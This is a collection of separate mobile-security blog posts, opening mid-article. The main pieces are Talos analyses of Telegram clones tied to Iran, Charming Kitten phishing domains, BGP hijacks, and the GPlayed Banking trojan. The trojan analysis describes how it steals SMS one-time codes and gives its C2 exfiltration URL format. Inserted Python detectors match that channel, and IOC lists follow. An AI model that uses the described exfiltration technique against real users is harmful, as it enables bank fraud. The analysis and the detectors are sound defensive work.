Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.

The service org.pouyadr.Service.MyService starts upon boot. This calls the MessagesController.getGlobalMainSettings() from the original Telegram package and will change the settings to include the proxy configuration.

The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.

The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. 

This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram," or (Golden Telegram). This application is available at cafebazaar.ir, an Iranian state-sanctioned Android application store.


Advanced Telegram cafebazaar page (translation by Google translate)

It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find a legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.

The application also contains code to use SOCKS servers located in several countries, which could be used to circumvent the ban. However, during our research we never saw these being used. On the other hand, when the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.

Fake websites

Spoofed Telegram Websites

The most straightforward approach to gain access to an end user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.

Fake Telegram login page

This domain was registered on July 25, 2017. Its tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — nami.rosoki@gmail[.]com — used to register this and other domains, as well as its passive DNS (pDNS) records, suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by another cybersecurity firm, Clearsky. Upon further inspection of the web page source code, it appears that the website was built using the GitHub project called "Webogram"; there were also strings in the source page suggesting that this website's display was designed for iPhones.

Source code, GitHub.com reference

Newly identified Charming Kitten domains


While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had a continuous interest in gaining access to end users' mobile devices and specifically their chat messages.
These domains were also registered using the same modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.


This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.

BGP Routing Anomalies


Background


While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcements, Talos noticed some routing anomalies originating from the Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in Request for Comments (RFC) 4271 as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows internet communications to occur when a resource located outside of the requesting network or autonomous system is requested.

BGP is used across the internet to assist with the selection of the best routing path. It's important to note that this selection can be manipulated at the ISP level, since BGP allows various path attributes to influence which route is chosen. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:

The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.

These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."

While this was designed as a feature to work around networking issues, no adequate security mechanism was added to prevent it from being abused. BGP offers no security mechanism other than optional methods such as MD5 passwords for neighbours, IPsec or GTSM. None of these are default requirements, and as such they are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route.

This could result in some traffic passing through a predetermined, or sub-optimal, route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. The effectiveness of a BGP hijacking session is measured by the number of BGP peers that receive the update message. The more peers that receive the update message, the more likely it is that traffic is being routed through the alternative sub-optimal path pre-configured by the actor.

Pre-Planned Routing Activity from ASN 58224


One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iran-based ASN 58224 announced an update for the prefix 185.112.156.0/22. The ASN that sent out the update message is owned by the Iranian telecommunications provider Iran Telecommunication Company PJS.

The range potentially being hijacked is associated with the Hungarian internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, it could have been a trial run for a larger BGP hijack attempt.


There were more significant BGP anomalies that originated from the same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as "more specific" prefixes at the exact same time, down to the second, impacting communications with Telegram. Because a router forwards on the longest matching prefix, routers that received this update message began routing some traffic destined for the Telegram servers through ASN 58224. This campaign proved particularly effective: a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.
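The two mechanisms described above, a more-specific prefix winning longest-prefix match and a hijack's reach being measured by how many peers accepted it, are easy to check programmatically. The following Python is an added example for this post, not Talos code or BGPStream's own API. The expected-origin table and the update records are constructed for illustration: the owner ASNs are RFC 5398 documentation numbers, not the real origins of those prefixes, and only 185.112.156.0/22 and AS 58224 come from the text.

```python
"""Flag more-specific announcements whose origin AS is not the expected one.

Added example. Records are constructed to resemble BGPStream elements
(peer ASN, prefix, AS path); they are not real observations.
"""
import ipaddress
from collections import defaultdict

# Constructed ground truth: prefix -> ASN that should originate it.
# 64500/64501 are documentation ASNs used as stand-ins for the real owners.
EXPECTED_ORIGINS = {
    "185.112.156.0/22": 64500,   # prefix from the June 30 event; owner ASN assumed
    "198.51.100.0/24": 64501,    # TEST-NET-2, stands in for a second monitored range
}

# Constructed updates: (peer_asn, prefix, as_path). Origin AS is the last hop.
SAMPLE_UPDATES = [
    (64496, "185.112.156.0/22", [64496, 64500]),          # legitimate, from the owner
    (64497, "185.112.156.0/24", [64497, 58224]),          # more-specific, foreign origin
    (64498, "185.112.156.0/24", [64498, 64510, 58224]),   # same hijack seen by a 2nd peer
    (64499, "198.51.100.0/25", [64499, 58224]),           # more-specific of 2nd range
    (64502, "203.0.113.0/24", [64502, 64511]),            # unmonitored prefix, ignored
    (64503, "185.112.156.0/22", [64503, 64510, 64500]),   # legitimate, via a transit AS
]


def covering_prefix(prefix, expected=EXPECTED_ORIGINS):
    """Return the most specific monitored prefix that contains `prefix`, or None."""
    net = ipaddress.ip_network(prefix, strict=False)
    best = None
    for known in expected:
        cov = ipaddress.ip_network(known)
        if cov.version == net.version and net.subnet_of(cov):
            if best is None or cov.prefixlen > ipaddress.ip_network(best).prefixlen:
                best = known
    return best


def classify(prefix, as_path, expected=EXPECTED_ORIGINS):
    """'ignored' if the prefix is not monitored, 'hijack' if the origin AS is wrong, else 'ok'."""
    covering = covering_prefix(prefix, expected)
    if covering is None:
        return "ignored"
    return "hijack" if as_path[-1] != expected[covering] else "ok"


def find_hijacks(updates, expected=EXPECTED_ORIGINS):
    """Group suspicious announcements by (prefix, origin) and count distinct peers.

    The peer count is the effectiveness measure used in the text: more peers
    accepting the route means more traffic diverted.
    """
    peers = defaultdict(set)
    for peer_asn, prefix, as_path in updates:
        if classify(prefix, as_path, expected) == "hijack":
            peers[(prefix, as_path[-1])].add(peer_asn)
    result = {}
    for (prefix, origin), seen in peers.items():
        covering = covering_prefix(prefix, expected)
        result[(prefix, origin)] = {
            "covering": covering,
            "more_specific": ipaddress.ip_network(prefix).prefixlen
                             > ipaddress.ip_network(covering).prefixlen,
            "peers": len(seen),
        }
    return result


def best_route(rib, destination):
    """Longest-prefix match: the forwarding rule that lets a /24 steal a /22's traffic."""
    addr = ipaddress.ip_address(destination)
    chosen = None
    for prefix, origin in rib:
        net = ipaddress.ip_network(prefix)
        if addr in net and (chosen is None
                            or net.prefixlen > ipaddress.ip_network(chosen[0]).prefixlen):
            chosen = (prefix, origin)
    return chosen


if __name__ == "__main__":
    for key, info in find_hijacks(SAMPLE_UPDATES).items():
        print(key, info)
    # A router holding both routes sends 185.112.156.x to the hijacker's /24
    # but 185.112.157.x, which only the /22 covers, to the legitimate origin.
    rib = [("185.112.156.0/22", 64500), ("185.112.156.0/24", 58224)]
    print(best_route(rib, "185.112.156.77"), best_route(rib, "185.112.157.10"))
```

Feeding real BGPStream elements into `find_hijacks` only requires mapping each element's peer ASN, prefix and AS path onto the same tuple shape; the expected-origin table is the part that has to be maintained from your own allocations or RPKI ROAs.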

How BGP Hijacking could have enabled computer network operations


Theoretically, this announcement could have been one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram traffic being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as documented by other security researchers two months prior, in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. There has been open-source reporting that suggests that Iran-based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with the Telegram SMS verification codes needed to gain access to Telegram accounts.

This particular capability would be attractive, since it could allow the actors to route traffic from neighboring ASNs through Iran. This could give the threat actors access to devices in nearby countries and let them compromise users of non-Iranian telecommunications providers.

The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.

Conclusions


The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. But we found several Telegram clones with several thousand installations that somehow contact IP addresses located in Iran, some of which advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives their operators total control over the messaging applications and, to some extent, over users' devices.

The long-lasting activity of groups like Charming Kitten, even when using classic phishing techniques, is still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was citizenship, it is understandable that the vast majority of any country's population won't be as educated about cybersecurity as a cybersecurity professional, so even this classic technique could be highly effective.

While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assesses with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time, routing two different Telegram ranges through four different subnets all associated with one ASN: 58224. This assessment also considers open-source reporting on Iran's complicated history with Telegram, from passing laws banning the use of Telegram to reports of outages resulting from Telegram's IP addresses being blocked in Iran.

Aside from the victims and the applications, Talos was unable to find any solid link between these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, with or without state sponsorship. Talos assesses with high confidence that users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.

IOC

Domains

talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
30dn[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn--oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

Hash values

8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d - followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 - ozvdarozv.apk

GPlayed’s younger brother is a banker — and it’s after Russian banks

This blog post is authored by Vitor Ventura.

Introduction


Cisco Talos published its findings on a new Android trojan known as "GPlayed" on Oct. 11. At the time, we wrote that the trojan seemed to be in the testing stages of development, based on the malware's code patterns, strings and telemetry visibility. Since then, we discovered that there's already a predecessor to GPlayed, which we are calling "GPlayed Banking." Unlike the first version of GPlayed, this is not an all-encompassing trojan. It is specifically a banking trojan that targets users of Sberbank AutoPay, a service offered by the Russian state-owned bank.

GPlayed Banking is spread in a similar way to the original GPlayed. It's disguised as a fake Google app store, but actually installs the malware once it's launched. This further illustrates the point that Android users need to be educated on how to spot a malicious app, and that they should be careful as to what privileges they assign to certain programs.
The malicious application is on the left-hand side.

Trojan architecture and capabilities


This malware is written in .NET using the Xamarin environment for mobile applications. The malware code is implemented in a DLL called "PlayMarket.dll."
GPlayed Banking issues its package certificate under a fake name that's not related to the application's name, nor the package's name.
Certificate information

The Android package is named "lola.catgirl." The application uses the label "Play Google Market," with an icon designed to look like the legitimate Google app store, and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we wish to highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.
The working capabilities of this trojan are limited to the ones needed to perform its objective as a banking trojan. The only exception is that it also contains the ability to exfiltrate all of the user's received SMS messages to the command and control (C2).

Trojan details


Once executed, the trojan will start to obtain administrator privileges on the device by requesting that the user change its settings.
Privilege escalation requests

If the user cancels the device's administration request, the request dialog will appear again after five seconds repeatedly until the user finally gives it administrator privileges. The malware contains code that could lock the device's screen, but it's never called. The same happens with another feature that needs the device's administrator privilege.
Unused code

Notably, in order to perform its activities as a banking trojan, none of these privileges are needed.

In the next step in its initialization process, the trojan creates a timer with a random value between 900 and 1,800 seconds. When triggered, this timer starts a WebView that is loaded from the URL hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html. This WebView is handed an amount of 500 which, given the victim profile, it is safe to assume is in rubles.

The overlay will completely cover the screen which, depending on the device, can make the mobile device unusable until reboot or the WebView is closed. The WebView code couldn't be determined because the C2 was never online during the investigation.
WebView blocking device

This WebView overlay technique is the same one used by the GPlayed trojan, from the same family. However, the GPlayed trojan loaded the WebView from local resources contained in the application package. In that case, the WebView requested the user's credit card information to pay for supposed "Google Services." Given the similarities, it is safe to assume that this WebView would have the same sort of objective. The change from having the WebView code hosted on the C2 to shipping it as a resource in the package shows that the authors want to remain independent from the C2.

After the malware creates the WebView, it sends an SMS to the Sberbank AutoPay (+79262000900) service with the word "баланс," which means "balance" in Russian. Upon receiving an answer, the trojan will parse it to determine the account balance. If it is lower than 3,000, the trojan won't do anything. If it is larger than 68,000 the trojan requests a value of 66,000, otherwise it will request the available amount minus 1,000.
Balance checking and amount decision

Finally, with the available amount determined, the trojan will create a new WebView object and request the amount defined according to the rules previously shown.

Password extraction code

In order to complete financial transactions, a validation code is necessary. So, the following action is the registration of an SMS handler that will parse any arriving SMS messages and look for the word "пароль," which means "password" in Russian. The malware parses the SMS containing that word to extract the password, which will then be injected into the previously created WebView. We believe this malware is specifically designed to evade the 3-D Secure anti-fraud mechanism because it injects a variable called "s3dscode" with the extracted value to the WebView object. The password is actually the validation code needed to validate the transaction.
The SMS receiver handler, besides parsing the 3-D Secure validation code, also sends all SMSs to the C2.
SMS exfiltration code

The SMSs are exfiltrated using a simple GET request to the REST-style URL hxxp://sub1[.]tdsworker[.]ru:5555/sms/. The format for this request is as follows:

<URL><device id>/<sender address>/<message content>
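Because the exfiltration channel is a plain HTTP GET with the SMS content in the path, it is visible to any proxy or web-gateway log. The following Python is an added example for this post, not Talos code: it parses constructed proxy log lines in an assumed "timestamp client method url status" layout, recognizes the `/sms/<device id>/<sender>/<message>` pattern on the C2 host from the IOC list, and tags events that look like an AutoPay balance reply or an intercepted one-time code. The device ID and message texts are made up; the C2 host, the AutoPay number and the "пароль" keyword are from the text.

```python
"""Detect GPlayed Banking SMS exfiltration in web proxy logs.

Added example, not Talos code. Log lines below are constructed; the
URL layout "<c2>/sms/<device id>/<sender>/<message>" is the one described
in the analysis, with each segment percent-encoded.
"""
from urllib.parse import urlsplit, unquote

C2_HOSTS = {"sub1.tdsworker.ru"}      # from the IOC list
AUTOPAY_NUMBER = "+79262000900"        # Sberbank AutoPay service number from the text
OTP_KEYWORD = "пароль"                 # "password": the 3-D Secure code SMS marker

# Constructed proxy log, format assumed: "<epoch> <client> <method> <url> <status>".
# Line 1: a balance reply from AutoPay ("Баланс: 45000 р"); line 2: a 3-D Secure
# code SMS ("Пароль: 123456"); lines 3-4 are benign or non-exfil traffic.
SAMPLE_PROXY_LOG = """\
1540000001.123 10.0.0.5 GET http://sub1.tdsworker.ru:5555/sms/3f2a9c1e/%2B79262000900/%D0%91%D0%B0%D0%BB%D0%B0%D0%BD%D1%81%3A%2045000%20%D1%80 200
1540000002.456 10.0.0.5 GET http://sub1.tdsworker.ru:5555/sms/3f2a9c1e/%2B79262000900/%D0%9F%D0%B0%D1%80%D0%BE%D0%BB%D1%8C%3A%20123456 200
1540000003.789 10.0.0.7 GET http://example.com/sms/notes/index.html 200
1540000004.012 10.0.0.5 GET http://sub1.tdsworker.ru:6565/index_main.html 200
"""


def parse_exfil_url(url):
    """Return {device_id, sender, message, port} for a C2 /sms/ URL, else None."""
    parts = urlsplit(url)
    if parts.hostname not in C2_HOSTS or not parts.path.startswith("/sms/"):
        return None
    # Split on literal "/" before decoding so an encoded %2F inside the
    # message body cannot shift the device id and sender fields.
    segments = parts.path[len("/sms/"):].split("/", 2)
    if len(segments) < 3:
        return None
    device_id, sender, message = (unquote(s) for s in segments)
    return {"device_id": device_id, "sender": sender,
            "message": message, "port": parts.port}


def tag_event(event):
    """Label what the exfiltrated SMS most likely is, based on the analysis."""
    tags = []
    if event["sender"] == AUTOPAY_NUMBER:
        tags.append("autopay-reply")
    if OTP_KEYWORD in event["message"].lower():
        tags.append("otp-intercepted")
    return tags


def scan_proxy_log(text):
    """Yield tagged exfiltration events from proxy log text, one dict per hit."""
    events = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        event = parse_exfil_url(fields[3])
        if event is None:
            continue
        event["client"] = fields[1]
        event["tags"] = tag_event(event)
        events.append(event)
    return events


if __name__ == "__main__":
    for ev in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(ev["client"], ev["device_id"], ev["tags"], repr(ev["message"]))
```

The C2 was offline during the investigation, so the same log would also show the port-6565 WebView fetch as a plain host match; the parser deliberately only raises an event for the `/sms/` path, since that is the one carrying victim data. Sample lines: the hostname and path checks alone are enough to alert, and decoding the message is what turns an alert into evidence of which one-time code was stolen.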

Trojan activity


This trojan hasn't been observed in the wild yet, and it's not being detected by many antivirus programs at the time of this writing. However, the samples were submitted for detection analysis in nearly the same week that Talos discovered the malware. Just like in the GPlayed trojan case, the pattern of detection-ratio checks was the same: first the package was submitted, followed by the DLL that holds the code. In the case of the DLL, GPlayed and this sample share one of the submission sources, further strengthening the link between the two. Given the architecture, organization and maturity of the code, the most likely relation is that this banking trojan was created from an early version of the GPlayed trojan code base by the same author(s), given that they also share a C2.
Code comparison (above banking trojan, below, the original GPlayed trojan)

Just like GPlayed, the C2 was never online during our research, but it would be easy to adapt this trojan to a new C2. Therefore, we don't know what was displayed in the WebView step mentioned previously. The icon file used by both malware families is the same, which can be considered another link between the packages.

Conclusion


This trojan was designed with a very specific group of victims in mind, namely Sberbank customers who use the AutoPay service. However, adapting it to fit other banks would be a trivial activity for the developers of the GPlayed malware family.

This malware family is just another example of why mobile users need to be critical about the permissions they grant to certain apps. There's no specific exploit that the GPlayed family uses to infect its victims; it can be installed on a device through a simple spam campaign. Android users need to be aware of two important points. By installing applications from untrusted application stores, they are putting themselves and their data in jeopardy. Also, granting the wrong permissions can make the difference between malware and a legitimate app. Users cannot trust permission justifications, as they are provided by the developer; they must be critical about the permissions and assign them on a case-by-case basis.

The interception of SMS validation codes is not a new technique for banking trojans. But this banking trojan, followed by the GPlayed trojan, shows a clear evolution of the actors behind these malware families. They went from a simple banking trojan to a full-fledged trojan with capabilities never seen before.

The DLLs used in the malware, which hold the majority of the code, have a low detection ratio, which shows that anti-virus solutions are not looking at the code in the file and are more focused on the Android package's permissions and resources. While we have not yet seen these files in the wild, they certainly have the potential to infect a large number of users and could quickly hijack a user's banking credentials.

Coverage


Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)

URLs

hxxp://sub1[.]tdsworker[.]ru:5555/sms/
hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html

Hashes

Package.apk - 81d4f6796509a998122817aaa34e1c8c6de738e1fff5146009c07be8493f162c
PlayMarket.dll - 3c82d98f63e5894f53a5d2aa06713e9212269f5f55dcb30d78139ae9da21e212

Mobile Menace Monday: top five scariest mobile threats

In the spirit of this upcoming Halloween season, we thought we’d provide you with a list of the top five scariest mobile threats in our book.

The list is organized from least to most haunting, based on my own humble opinion gathered from several years as a mobile threat researcher. Of course, my opinion has also been formed by the data we’ve collected within the last few months that shows which threats have been terrorizing customers the most. Without further ado, these are the top threats that haunt my dreams.

5) The clinking of locks and chains

Although not the most prevalent mobile malware (thank goodness), mobile ransomware's nastiness will give you the chills. It starts by tricking users into giving away their device administrator rights. Afterwards, the ransomware offers the treat of locking the device from any use unless you pay a ransom.

Even scarier, some mobile ransomware threatens prosecution by law enforcement, claiming illegal activities have been conducted on the device. This is all a hoax, as law enforcement would never request paying a fine through payment methods like Bitcoin or gift cards. The most popular mobile ransomware family is detected by Malwarebytes as Android/Ransom.SLocker.

4) Guerrilla warfare

As a mobile researcher, it sometimes feels like a war out there. This is especially true with the mobile malware Android/Trojan.Guerrilla. Guerrilla warfare can be described as irregular, which sums up this Guerrilla's tactics of obfuscating itself to evade malware scanners. Infections usually come with multiple variants of Guerrilla running on the device. However, for every move they make, we have a counter move. The war is never-ending.


3) Dashing from ghosts?  No, to the top of detections list!

Android/Adware.MobiDash will make your skin crawl! It's one of the most highly-detected threats we've seen on customers' Android devices! As if possessed, MobiDash goes above and beyond the typical low-level adware. It starts by sneaking its way into getting device administration rights. Once given, the user will be doomed with ads on their lock screen.

Good luck uninstalling, as some versions are especially good at hiding themselves in plain sight!

2) Lurking in the shadows…of code!

Another high-ranking threat found on customers' Android devices, Android/Trojan.HiddenAds, is a smooth criminal. Also known as Android/Trojan.Hiddad, its haunting ability to effectively hide its malicious code is terrifying! In fact, it often bypasses Google Play Protect's verification system. Thus, apps infected with HiddenAds make it onto the Play Store. After installing on a device, periodic full-screen ads will haunt you!

1) The one that keeps me up at night: Adups

Seriously, I have lost sleep over this one. Adups and I have a long history:

Mobile Menace Monday: Adups, old and new

Mobile Menace Monday: upping the ante on Adups

Adups comes in many forms, but the most prevalent is Android/PUP.Riskware.Autoins.Fota. This variant can potentially auto-install malware like Android/Trojan.Guerrilla and Android/Trojan.HiddenAds. As addressed in the blogs linked above, it's a preinstalled system app (or apps). Thus, it cannot be uninstalled through the device's application information page, only disabled. However, the nightmare gets worse: on some devices Adups can't even be disabled. Not even a mobile scanner can remove or disable it.

So how do we deal with this Freddy Krueger of a mobile threat? Well, you're going to have to defeat it in a different realm: the realm of the ADB command line tools, which ship with Google's Android Studio. Luckily, we found a way to wake up from the nightmare, as we recently updated a guide on how to fully uninstall (not just disable) Adups. Beware, though, this tutorial is not for the faint of heart, and is only recommended for advanced users.

Safe room

When the boogie men of mobile threats try to break through the walls, we have a safe room for you: Malwarebytes for Android keeps the scariest mobile threats at bay! Stay safe out there!

The post Mobile Menace Monday: top five scariest mobile threats appeared first on Malwarebytes Labs.

Stolen Apple IDs reportedly used for mobile payment theft in China

Users of two major mobile payment services in China -- Alipay and WeChat Pay -- have reported unauthorized Apple App Store spending in recent days, with some losing nearly $300 through fraudulent transactions. The companies say that stolen Apple IDs are to blame, the Wall Street Journal reports, and Alipay has asked Apple to investigate. In the meantime, Alipay is telling its customers to minimize potential losses by reducing how much money can be used from their accounts without a password.

Via: 9to5Mac

Fortnite: When Dollars and Cents Trumps Security!

When Epic Games recently announced and subsequently released Fortnite for Android, it took the decision to bypass the Play Store and ask users to side-load the app. After I read that Epic Games’ brilliant idea was to ask Android users to essentially downgrade the security on their devices, there was a lot of head-on-desk action.

Side-loading an app onto an Android device is essentially asking the user to download it from a website instead of the Play Store and then ignore the Android warnings about installing apps from untrusted locations. In more recent Android versions this safety net is called "Install unknown apps" and is granted per app, and when a user tries to install an app directly from a website, the operating system will ask them a few times if they really want to do this. Note that this does not affect users on Apple iOS devices, as Apple locks down app distribution to the App Store.

Don't get me wrong, I understand both the business reason and the developer logic that drove Epic Games to release the Android version in this way. For developers, Android's lack of homogeneity means they often have to validate their app across multiple stores, each with its own constraints and minimum requirements. Thus, what should be a simple app release can gain an Nth degree of complexity: increased time to develop and associated maintenance, leading to increased cost. This is not an attractive prospect for any vendor wanting to deliver a product. Add the fact that the Play Store takes a 30% cut on all transactions, and you can see why an app vendor would look to avoid this if they could! Let's face it, gaming companies have to make money in order to recoup the investment in the development and maintenance of the game.

You may be reading this wondering why incentivising users to side-load popular games is really a problem. Fundamentally, it introduces bad habits to users. These bad habits break down the general foundations of mobile device security. The Fortnite game has a huge following and we can’t neglect the message being sent not only to users but also other app developers.

In InfoSec, we constantly argue the benefits of teaching users safe and secure principles for using electronic devices, browsing the web and installing applications. The Epic Games Android installation is the antithesis of these teachings, instead sending a clear message to users, especially a younger generation that will one day enter the workforce, that it is OK to install apps from any location.

The fact is, Epic Games is inadvertently making it easier for a malicious party to trick users into downloading fake apps and providing an opportunity for these malicious parties to introduce fake apps into the official store. This has been seen before, especially in the banking industry, and was even the case for Fortnite itself during the beta period. Google Play Protect is one element of sanity in this situation, as it will scan the apps on the device. Unfortunately this is only a recent addition to Android and is not always available, depending on the version or the manufacturer of the device.

The issues continue even after the app is installed and being used. Fortnite, like many games, is free to play but relies extensively on in-app purchases, the pay-to-win paradigm. By not using the Play Store to deliver the app, the vendor needs to set up its own payment infrastructure and ensure it is safe. This in itself is not an easy task and can be fraught with errors and potential for data loss.

Stepping back and analysing the situation, where does one place blame? I think a majority of us in the industry, myself included, will scorn the vendor for not doing the right thing and promoting bad habits to users. Looking beyond the initial rapid shame response from the industry, I think it is interesting to put oneself in the vendor's shoes. I can see how the lack of standardisation, draconian processes and exorbitant fees would make it unattractive to go to market via the various app stores in the "proper way". Perhaps it is time for companies like Apple and Google to rethink the app distribution model, so all can benefit from a secure platform?

Realistically, I believe that this situation just boils down to the ability of a business to make a profit and, you know what, this isn't the first time or place where security has been compromised or downgraded because of money. Let's face it, we see it all the time, most recently in IoT security and more generally in corporate security when a security risk is accepted instead of investing time and funds in fixing it.

This is why we can’t have secure things!

Update: Seems like fake Fortnite apps are already in the wild, more here

Thanks to Hannah Finch for the editorial review

The post Fortnite: When Dollars and Cents Trumps Security! appeared first on Liquidmatrix Security Digest.

The Evolution of Mobile Security

Today, I posted a blog entry to the Oracle Identity Management blog titled Analyzing How MDM and MAM Stack Up Against Your Mobile Security Requirements. In the post, I walk through a quick history of mobile security starting with MDM, evolving into MAM, and providing a glimpse into the next generation of mobile security where access is managed and governed along with everything else in the enterprise. It should be no surprise that's where we're heading but as always I welcome your feedback if you disagree.

Here's a brief excerpt:
Mobile is the new black. Every major analyst group seems to have a different phrase for it but we all know that workforces are increasingly mobile and BYOD (Bring Your Own Device) is quickly spreading as the new standard. As the mobile access landscape changes and organizations continue to lose more and more control over how and where information is used, there is also a seismic shift taking place in the underlying mobile security models.
Mobile Device Management (MDM) was a great first response by an Information Security industry caught on its heels by the overwhelming speed of mobile device adoption. Emerging at a time when organizations were purchasing and distributing devices to employees, MDM provided a mechanism to manage those devices, ensure that rogue devices weren’t being introduced onto the network, and enforce security policies on those devices. But MDM was as intrusive to end-users as it was effective for enterprises.

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see. OS Updates and Security Patches are slow to arrive and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are on whatever device they're using. So, the challenge is to control the flow of information and restrict it to proper use.

